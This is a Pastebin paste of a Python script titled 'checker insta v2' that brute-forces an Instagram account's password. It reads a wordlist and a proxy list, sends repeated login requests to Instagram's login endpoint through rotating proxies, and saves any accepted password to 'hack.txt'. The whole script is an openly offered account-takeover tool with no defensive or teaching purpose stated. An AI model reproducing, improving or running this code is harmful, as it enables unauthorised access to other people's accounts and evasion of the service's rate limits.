6g7r

checker insta v2

Apr 21st, 2021 (edited)
1,156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.17 KB | None | 0 0
  1. import requests, uuid, secrets, json, random
  2. from time import sleep
  3. from colorama import Fore
  4. proxy = open('proxy.txt','r').read().splitlines()
  5.  
  6. r = requests.session()
  7. print(Fore.LIGHTMAGENTA_EX, """
  8. ███████▀▀▀░░░░░░░▀▀▀███████
  9. ██████▀░░░░░░░░░░░░░░░▀████
  10. █████│░░░░░░░░░░░░░░░░│████
  11. ████└┐░░░░░░░░░░░░░░░┌┘░███
  12. ███░░└┐░░░░░░░░░░░░░░┌┘░░██
  13. ███░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
  14. ██▌░▄██████▄░░░▄██████▄░▐██
  15. ███─┘░░▓▓▓▓░░░░░▓▓▓▓░░└─███
  16. ██▀▓▓▓░▓▓▓▓░░░░░▓▓▓▓░▓▓░▀██
  17. ██▄▓▓▓░▓▓▓▓▄▄▄▄▄▓▓▓▓░▓▓▄███
  18. ████▄─┘█████████████└─▄████
  19. █████░░▐███████████▌░░█████
  20. ██████░░▀█████████▀░░▐█████
  21. ███████░░░░▓▓▓▓▓░░░░▄██████
  22. ████████▄░░░░░░░░░▄████████
  23. ███████████▓▓▓▓▓███████████
  24. ███████████▓▓▓▓▓███████████
  25. 𝑖𝑛𝑠𝑡𝑎 : 6𝑔7𝑟_ℎ𝑒𝑟𝑒
  26. """)
  27. user = input('Username : ')
  28. password = input('file pass : ')
  29.  
  30. pp = password
  31. file = open(pp).read().splitlines()
  32. proxylist = []
  33. while True:
  34. for pxr in proxy:
  35. proxylist.append(pxr)
  36. pxx = str(random.choice(proxylist))#insta 6g7r_here
  37. for file in file:
  38. headers_login = {
  39. "Accept": "/",
  40. "Accept-Encoding": "gzip, deflate, br",
  41. "Accept-Language": "en-US,en;q=0.5",
  42. "Content-Length": "267",
  43. "Content-Type": "application/x-www-form-urlencoded",
  44. "Cookie": "missing",
  45. "Host": "www.instagram.com",
  46. "Origin": "https://www.instagram.com/",
  47. "Referer": "https://www.instagram.com/",
  48. "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0",
  49. "X-CSRFToken": "missing",
  50. "X-IG-App-ID": "936619743392459",
  51. "X-IG-WWW-Claim": "0",
  52. "X-Instagram-AJAX": "a57770cf770b",
  53. "X-Requested-With": "XMLHttpRequest"
  54. }
  55. data_login = {
  56. 'username': user,
  57. 'enc_password': '#PWD_INSTAGRAM_BROWSER:0:1589682409:' + file
  58. }
  59. try:
  60. proxx = {
  61. 'http': 'http://{pxx}',
  62. 'https': 'http://{pxx}'
  63. }
  64. sleep(0.1)
  65. req_login = requests.post('https://www.instagram.com/accounts/login/ajax/', headers=headers_login,data=data_login,proxies=proxx,timeout=3).text
  66. if ('"authenticated":false') in req_login:
  67. sleep(0.1)
  68. print(Fore.RED,f'password is wrong:{file}')
  69. sleep(0.1)
  70. else:
  71. print(Fore.GREEN, f' password is Good {file}')
  72. open('hack.txt','w').write(f'{file}\n')
  73. except requests.exceptions.ConnectionError:
  74. pass
  75. print(f"Bad Proxy : {pxx}")
Add Comment
Please, Sign In to add comment